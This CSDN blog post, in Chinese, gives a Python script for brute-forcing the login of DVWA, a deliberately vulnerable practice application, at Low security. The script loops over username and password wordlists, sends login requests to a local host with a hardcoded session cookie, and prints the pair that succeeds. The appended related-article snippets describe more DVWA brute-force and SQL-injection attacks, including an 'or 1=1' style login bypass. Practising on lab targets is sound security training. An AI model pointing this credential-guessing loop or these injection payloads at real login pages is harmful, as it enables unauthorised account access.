DVWA暴力破解Low级Python脚本

最新推荐文章于 2024-07-30 11:53:50 发布
最新推荐文章于 2024-07-30 11:53:50 发布
阅读量183 收藏
点赞数 2
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74485250/article/details/136218612
版权

代码如下:

import requests

HOST = '127.0.0.1'

USZiDian = input("UserName字典路径 : ")
with open(USZiDian,'r') as uf:
    User = uf.read().split('\n')

PAZiDian = input("PassWord字典路径 : ")
with open(PAZiDian,'r') as pf:
    Pass = pf.read().split('\n')

headers = {
    'Host': HOST,
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Referer': f'http://{HOST}/vulnerabilities/brute/',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Cookie': 'PHPSESSID=pnhm6bioohb39ih33t718b0l22; security=low',
    'Connection': 'close'
}
flag = 'Welcome to the password protected area admin'
for UserName in User:
    for PassWord in Pass:
        url = f'http://{HOST}/vulnerabilities/brute/?username={UserName}&password={PassWord}&Login=Login#'
        response = requests.get(url=url, headers=headers)
        LocStart = response.content.decode().index('<p>')+3
        LocEnd = response.content.decode().index('</p>')
        if(response.content.decode()[LocStart:LocEnd] == flag):
            print("\033[32m" + f"[+] {UserName}:{PassWord} is True" +"\033[30m")
            break
        else:
            print("\033[31m" + f"[-] {UserName}:{PassWord}" +"\033[30m")

XyLin.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pythondvwa进行密码爆破
HYN20070813的博客
08-02 504
在CSDN上找了不少关于Pythondvwa密码爆破的文章,结果一个都不能用…… 于是用一晚上写了这个dvwa密码暴破程序 废话不多说,上代码: import time from selenium import webdriver import sys driver = webdriver.Firefox(executable_path=r'D:\Program Files\geckodriver.exe') #改为你的geckodriver位置 driver.get("http://127.0
DVWA 暴力破解 low
Neko的博客
03-11 507
DVWA 暴力破解 low 这里的环境是 一个win7系统 一个KALI系统 所需: DVWA-master.zip 下载地址传送门 phpStudy.zip 下载地址传送门 1.启动phpStudy 通过【其他选项菜单–>phpStudy设置–>端口常规设置】检测端口是否有被其他程序占用,若占用了则修改一下httpd端口 2.Mysql 设置 根据mysql数据库设置的账户信息(用户名/密码:root-----root),填写到phpMyAdmin登录界面对应的输入框进行登录 环境监
DVWA-多个工具及python代码实现暴力破解登录
nex1less的博客
07-19 2262
前言现在那个DVWA里的Brute Force都已经烂大街了,那么今天我们就来演示一下如何从登录页面暴力破解进去 0x01.python代码: 1.在浏览器找到dvwa登录页面 2.我们尝试提交数据: 发现点击登录之后url上依然是login.php,并且出现login failed 提示 由此我们确定此页面的http请求方式为post 3.打开Burpsuite并...
学习Python渗透第十二天:用Python实现暴力破解
2203_75839317的博客
03-25 1288
接下来,我们来编写一个可以实现登录功能的Python程序,这里需要用到requests库,这是一个专门用来处理HTTP的库,利用这个库发起请求十分简单,例如我们需要发送POST请求,需要用到requests.post()函数,这个函数比较复杂,常用格式如下。
python如何实现简单的暴力破解
最新发布
weixin_43305645的博客
07-30 1130
该项目的核心是实现简单网页端的密码破解,主要是为了给没有基础的人,提供一个思路,了解这方面的攻防原理,实际用途不大,现在大部分有三代四代验证码,还有一些加密算法等,并不会像文章中这么简单的实现直接跑字典而获取密码。文章内的前后端是特意写的,需要源码的话,我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。
DVWA系列】一、Brute Force 暴力破解(源码分析&python脚本实现)
Pluto.的博客
03-09 1673
文章目录DVWABrute Force 暴力破解一、low别二、medium别三、highDVWA Brute Force 暴力破解 一、low别 无任何安全防护措施 爆破方法:bp抓包 —> 发送到Intruder模块 —> 定义变量 —> 导入密码字典 —> 开始爆破 根据长度可得密码: 源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // 获取用户名 $user = $_GET[ 'username'
dvwa——Brute Force 低和中python脚本解法一步一步思维引导
记录并分享学习安全的知识点..
01-05 684
一、首先看下面两段代码 第一段代码: a = '1\n2\n3\n44' #定义变量值,\n表示换行 file = open('1.txt','w') #打开1.txt文件如果有该文件则清空文件内容,没有则创建开启写入模式 file.write(a) #将变量a里面的值,写入1.txt里面 file.close() #关闭文件 f = open('1.txt','r') #再次打开1.txt文件开始进行读取模式 print (f.read()) #读取全部内容 print ('----
Python暴力破解网站登录密码脚本
xff123456_的博客
06-14 1854
测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等关键代码解释url指定url地址 header设置请求头 payload设置请求参数 这一行的作用是做一次get请求,响应信息被变量Response接收 这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解这种方式和burp的Intruder模块的Cluster bomb攻击方式一样 然后把循环结果存放到csv文件里,用逗号分割数据Response.status_code是响应的http状态码,len(Response
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 390
SQL-Injectionlow首先我们将dvwa调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
DVWA系列之Brute Force(暴力破解)源码分析及漏洞利用
7Riven's blog
11-26 2038
Brute Force Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。字典本生成:http://tools.mayter.cn/ 目录 low别源码分析 medium别源码分析 high别源码分析​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web ...在DVWA SQL注入的例子中,根据提供的引用,通过修改Python脚本中的SQL查询语句,可以针对不同的安全等Low、Medium、High、Impossible)进行SQL注入攻击。
使用Python脚本学习DVWA-Brute Force(爆破)
weixin_43838889的博客
04-22 1336
使用Python脚本学习DVWABrute Force(爆破)LowPython 脚本密码字典文件执行结果修改后脚本:执行结果 Brute Force(爆破) 本文全程参考[https://blog.csdn.net/zy15667076526/article/details/109705286?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0]向该博主致谢(https://blog.csdn.net/zy
python专场——暴力破解DVWA
m0_52923241的博客
08-27 3117
暴力破解python编写针对登陆的暴力破解程序工作原理暴力破解的三种思路生成字典文件DVWA登陆的暴力破解程序Brute Force(暴力破解) 用python编写针对登陆的暴力破解程序 工作原理 首先这是一种针对用户名密码登陆的情况,用户输入用户名和密码,只要与服务器保存的信息相一致就可以获得对应的权限。 暴力破解的三种思路 通常用户名不会作为隐私,当获得用户名之后就可以使用暴力破解的方法(暴力破解即逐个尝试) 纯字典攻击:需要合适的字典文件;利用攻击工具将用户名和字典文件中的密码组合起来,依次尝试
DVWA学习之Brute Force暴力破解python脚本实现)
qq_31426383的博客
11-30 1736
DVWA学习之Brute Force暴力破解概述具体过程问题讨论(求大佬解答)1. Low1.1 网页源码1.2 攻击实现(一)1.3 攻击实现(二)2. Medium2.1 网页源码2.2 攻击实现12.3 攻击实现23. High3.1 网页源码3.2 攻击实现(一)3.3 攻击实现(二)4. Impossible4.1 网页源码 概述 搭建方法请转至DVMA学习之安装、环境搭建等。 本文主要使用 python 脚本来实现 Brute Force,文末有一些未解问题,期待一起讨论。 具体过程 模拟访问网
DVWA全系列--暴力破解、命令注入、跨站请求伪造
leriger的博客
09-23 475
做之前看代码(view source)如果在username中输入admin' or '1'='1对于$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';就会变成$query = "SELECT * FROM `users` WHERE user = 'admin' or '1'='1' AND password = '$pass';
ctf 逆向 暴力破解类的脚本
cainiao78777的博客
03-15 1822
前言:在分析代码的时候常遇到不好逆向的逻辑,如求余(%)等,下面就是含有求余的两道逆向题目 例题一:buuctf [ACTF新生赛2020]rome 1.查壳 无壳32位exe. 2.ida32打开并分析main函数 发现主要函数 func() int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch
DVWA-LOW暴力破解
weixin_47498728的博客
05-05 1041
1、使用phpstudy,启动Apache和Mysql服务 2、打开Burp Suite,一直Next就可以 3、开始使用工具,无需配置网络代理,拦截状态显示OFF 4、进入dvwa,网址:http://localhost/login.php 使用默认账号密码登录,admin password 5、将安全等设置为low 6、开启抓包工具,拦截状态显示ON 7、选择暴力破解,输入任意的账号密码,login 8、在Burp Suite中得到请求代码,全选按Ctrl+I或者点击鼠标右键Send t
dvwa暴力破解参考文献
05-19
以下是dvwa暴力破解的参考文献: 1. DVWA官方文档:https://github.com/ethicalhack3r/DVWA/wiki 2. DVWA漏洞实验平台及渗透测试实战详解:https://www.cnblogs.com/-qing-/p/11787296.html 3. DVWA实验环境搭建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值